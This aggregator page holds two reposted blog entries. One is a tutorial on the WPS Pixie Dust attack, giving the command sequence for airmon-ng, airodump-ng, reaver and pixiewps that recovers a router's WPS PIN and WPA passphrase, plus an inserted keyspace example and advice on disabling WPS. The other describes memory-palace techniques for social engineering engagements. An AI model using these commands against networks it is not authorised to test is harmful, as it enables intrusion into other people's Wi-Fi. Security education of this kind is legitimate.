Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple PIN instead of your hard-to-guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use as a chocolate fireguard: instead of taking potentially years to crack, an attacker can go after the PIN, which only has 11,000 possibilities, and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets used in Wireless Access Points allows the WPS PIN to be recovered in less than a second, and with it the WPA passphrase. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret, but when they are disclosed they can be used together with the Enrollee and Registrar Public Keys, the E and R Nonces and the Auth Key to recover the WPS PIN.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 passphrase in less than a second. Capturing the WPA2 handshake and attacking it directly with a single GPU, the estimated time to crack (assuming the passphrase is known to be alphanumeric with no special characters) is 853,399 days, 2 hours and 44 minutes. So yes, WPS adds some weakness to your hardened access point :)
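As an added example that is not part of the original post, the following Python shows the arithmetic behind the "11,000 possibilities" figure above. A WPS PIN is 8 digits, but the last digit is a checksum over the first seven, and the protocol confirms the first four digits separately from the last three, so the two halves can be verified independently: 10^4 + 10^3 = 11,000 rather than 10^8. The checksum routine is the one from the WPS specification; the function names and the `keyspaces` comparison are my own, and the code touches no network, it only shows why the PIN is a weak secret.

```python
# Added example (not from the original post): keyspace arithmetic for WPS PINs.
# wps_checksum implements the checksum digit defined in the WPS specification.

def wps_checksum(first_seven: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN body.

    Digits are weighted 3,1,3,1,3,1,3 from the most significant end, and the
    checksum is whatever makes the weighted sum a multiple of 10.
    """
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)   # odd positions (counted from the right) weigh 3
        pin //= 10
        accum += pin % 10         # even positions weigh 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def keyspaces() -> dict:
    """Number of candidates a defender should assume for each view of the PIN.

    naive_8_digit:   treating all 8 digits as independent secrets
    with_checksum:   the checksum removes one free digit
    wps_split_halves: the protocol confirms the first half on its own, so the
                      halves are searched one after the other, not multiplied
    """
    return {
        "naive_8_digit": 10 ** 8,
        "with_checksum": 10 ** 7,
        "wps_split_halves": 10 ** 4 + 10 ** 3,
    }


if __name__ == "__main__":
    # 12345670 is the commonly cited example PIN; its checksum digit is 0.
    print(wps_checksum(1234567))
    print(is_valid_wps_pin("12345670"))
    print(keyspaces())
```

The takeaway for a defender is the last entry of `keyspaces()`: whatever the passphrase strength, an enabled WPS PIN reduces the effective secret to a few thousand guesses, which is why disabling WPS (and verifying it is disabled, as the end of the post describes) matters more than lengthening the passphrase.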

Below are the commands used during the above video; you can copy and paste them, filling in your own values where the arguments are left blank.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon --wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu rather than Kali, you will need the following packages (cheers Matt):

apt-get install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following values to confirm the Access Point has WPS enabled: 1.0, LAB, PBC, NFC, PIN. If none of these appears, either WPS isn't supported on the device or you have successfully disabled it.

Filed Under: Hacking, Tools

Subliminal Hacking Blog April 29, 2011

Remember Remember … Constructing A Memory Palace

So today is the Royal Wedding, and I am sure none of you had forgotten that. However, as we have discussed before, memory isn't really the best at remembering stuff, and our subconscious is only too happy to fill in the gaps with made-up information to make us feel better :)

There are some individuals with mad memory retention though: Ben Pridmore, Boris Conrad and Wang Feng, to name a few, are world memory champions. The interesting thing is that all of us have this amazing ability to some extent; we just need a method to follow and, like any skill, we need to practice it.

So why is good memory retention of benefit to you as a social engineer? Well, in my opinion it is very useful. One of the key skills of social engineering is being able to see the big picture and think on your feet. Sure, you can use a pen and paper, but this isn't always practical and not exactly covert. Wouldn't it be of benefit to remember badge numbers, items you see in wallets and bags, people's names, etc. that you notice as you're completing your engagement, as well as during all the prep work?

I had heard about these memory techniques, especially in relation to magic and mentalism, however it wasn't until I read Derren Brown's Tricks of the Mind that I found a method that it appears I was already using to some extent but have now developed further. This method is the loci system. Simply put, it works by associating images with places you are familiar with in real life, along a route you can easily recall. The loci mnemonic is often referred to as a memory palace, because you can construct a virtual palace in your mind (perhaps based on your house) and have a defined route along which you place objects.

My personal memory palace is my local Tesco store. I have a set route when I go shopping, and it's a large store with lots of space for storage; I literally have shelves of space to remember stuff. I am by no means an expert, but I am certainly better at remembering using this method than I have been in the past.

There are a few books on this subject, and I will mention these at the end. For now I will summarise how you can go about building your own memory palace, then you can try it out and perhaps save yourself a few quid on books.

First things first, to have an effective memory palace you need a decent foundation. So you need to construct your palace of choice in your mind. This could be completely fictional, however a real environment you know well and can visualise will no doubt be much easier to use. You can always change and grow your memory palace, so I suggest you start off with just a room, with its furniture etc., so you have somewhere to store your visual memory items.
Next you need to define how you get around. A memory palace is going to be difficult to recall and access if information is all over the shop, so you need a defined, repeatable route (this is why the supermarket is good for me, as I do the same aisles each time in a certain order) describing how you travel through your memory palace, what objects you pass, etc.
Now we have the foundations in place and the route we will take around our memory palace, we need to furnish the environment. You don't need to use actual furniture, but each piece should be distinct, easy to identify and different from the others. So if initially you want to remember 10 things, you should allocate 10 different pieces of furniture so you have somewhere to place the memories. I recommend you put in as much as you can so you have room for growth in that room, and you can then add other rooms with other distinct furniture (you don't want them to be the same, as this will add confusion).
Now it's all built up in your mind, it's time to remember everything in real detail. Do a decent number of laps around your route, remembering all the furniture and its order on the route; really commit to it, imagine the colours, smells, what it feels like, as much detail as possible. If you have decided to completely make this up, you may want to draw a blueprint of some kind to really help you visualise and commit everything to memory. Spend some time here, and come back often, as this is an important part of developing your memory palace.
Good to go. Hopefully now everything is in place, so you can try it out. A good, not super critical, way I find to test yourself is your shopping list. Give yourself a reasonable test, so more than 10 items; go for 20 on your first outing (make sure you have the furniture to accommodate them). Place each item on your shopping list on a piece of furniture in your memory palace, circle around your route a couple of times, then head out and test it. It does not always need to be the actual item; it could be a symbol of something bigger that will trigger another memory to remind you.
Rinse and repeat. For things you want to commit to longer term memory (perhaps an engagement in a few weeks), take some time to really explore your memory palace and be creative with what you use to trigger those memories; the more wacky the better sometimes. The more familiar you become with your palace, the more memorable it will be and as a result the more effective.
Getting comfortable. As you get more familiar with your palace you will find it grows and becomes more valuable, and you will use it for all sorts of things. You will also find you can start at any point on your route, so you don't always need to start from point one; you could kick off from point 5.
Monopoly. We have mentioned already that adding new rooms and expanding your palace is possible and encouraged, however you may have a reason to really segment your memories. In this case get yourself an additional palace, and add it to the road of memory palaces you may want to acquire over time. The process for setting up another memory palace is always the same; just remember to set up a route from one palace to the other.

Hopefully you found this post of interest and you're going to give it a shot. If you are dubious about the success you will have, I would like to ask you to recall the last time you left your keys somewhere: what did you do? If, like most people, you retraced the steps (route) you took recently, then as if by magic you were able to narrow down the area where to look. This is very similar, just a lot more focused and dedicated to a purpose.

The Memory Book – Harry Lorayne
Tricks Of The Mind – Derren Brown
The Memory Palace of Matteo Ricci – Jonathan Spence
Chambers For A Memory Palace – Donlyn Lyndon
Max Your Brain – James Harrison
How To Be Clever – Ben Pridmore

Filed Under: Mentalism, Social Engineering, Subliminal Hack, Tools

© Copyright 2025 Social Engineering Blogs · All Rights Reserved ·